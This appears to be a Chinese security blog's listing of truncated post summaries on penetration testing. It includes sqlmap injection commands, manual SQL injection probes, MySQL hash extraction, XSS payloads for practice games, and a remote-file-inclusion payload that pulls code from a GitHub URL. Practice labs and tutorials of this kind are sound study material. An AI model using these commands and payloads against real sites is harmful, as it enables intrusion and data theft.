APT-101

摘要： /pentest/database/sqlmap/txt/ common-columns.txt 字段字典 common-outputs.txt common-tables.txt 表字典 keywords.txt oracle-default-passwords.txt user-agents.t 阅读全文

摘要： 一、SQLMAP用于Access数据库注入 python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id 阅读全文

摘要： PHP中异或 (^) 的概念 <?php echo"A"^"?";?> <?php echo"A"^"?";?> 输出的结果是字符 “~”，这是因为代码对字符 “A” 和字符 “?” 进行了异或操作。在 PHP 中两个变量进行异或时，会先将字符串转换成 ASCII 值，再将 阅读全文

摘要： 具体的获取方法： 1）通过hex 十六进制的工具打开user.MYD文件 这里使用：0XED 2）复制MySQL密码出来，进行分析 *CEAF6E9FA3A448A25AC9D00C8D7078385 #33位 前面带*号说明是40位加密把所有的密文hash全部列出来 6B54FBC #七位 has 阅读全文

摘要： 概述： 判断注入点： http://www.xxxxx.com/page.php?pid=42 and 1=1 #true http://www.xxxxx.com/page.php?pid=42 and 1=2 #false 猜表的列数 http://www.xxxxx.com/page.php? 阅读全文

摘要： https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe 分析题目，属于时间盲注，这种情况，通常使用sqlmap 直接注入就行了，手动语法太复杂了！！！ sqlmap -u "http://219.153 阅读全文

摘要： https://xss-game.appspot.com/level1 https://xss-game.appspot.com/level1 payload: <svg onload=alert(1)> https://xss-game.appspot.com/level2 过滤掉了<script 阅读全文

摘要： https://alf.nu/alert1 warmup adobe JSON 阅读全文

摘要： 概述： https://xss-quiz.int21h.jp/ Stage #1 payload： <script>alert(document.domain);</script> Stage #2 http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed 阅读全文

摘要： http://www.zixem.altervista.org/RCE/level1.php 构造payload： https://zixem.altervista.org/RCE/level1.php?page=https://raw.githubusercontent.com/pipter/SR 阅读全文